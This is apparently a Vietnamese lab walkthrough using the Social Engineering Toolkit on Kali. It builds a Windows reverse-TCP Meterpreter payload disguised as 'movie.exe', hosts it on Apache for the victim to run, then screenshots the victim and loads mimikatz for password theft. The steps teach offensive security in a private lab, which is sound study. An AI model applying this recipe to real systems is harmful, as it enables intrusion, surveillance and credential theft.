- Sử dụng lệnh “Ifconfig” để kiểm tra địa chỉ IP. Ở đây địa chỉ IP là: 192.168.194.162
2/ Launch the Social Engineering Toolkit
3/ Creating Infectious Media - Chọn phương thức “Social-Engineering Attacks” - Chọn “Infectious Media Generator”
- Chọn “Standard Metasploit Executable”
- Chọn “Windows Reverse_TCP Meterpreter”. Sau đó nhập địa chỉ IP hiện tại và nhập Port là 5555
- Sau khi chạy xong chọn Yes
4/ Delivering the Payload to the Windows Target: - Khởi động service apache “service apache2 start”
5/ Running the Malware on the Target Machine:
- Bên máy nạn nhân, chạy url “192.168.194.162/movie.exe” để tải file movie.exe được tạo ở trên bên máy kali. Chạy file movie.exe. 6/ Exploiting the Target: - Sau khi chạy file movie.exe bên máy nạn nhân. Ta thấy có 1 thông báo được gửi về máy kali. Hiển thị 1 Meterpreter session 1 đã được mở từ 192.168.194.162:5555(Ip máy kali) 192.168.194.134:49193( Ip máy nạn nhân).
7/ Opening an Interactive Meterpreter Session:
- Chạy lệnh “sessions -i 1”, thử câu lệnh “screenshot” để chụp màn hình nạn nhân - Kết quả:
8/ Stealing a Password: - Chạy lệnh “load mimikatz” và “kerberos”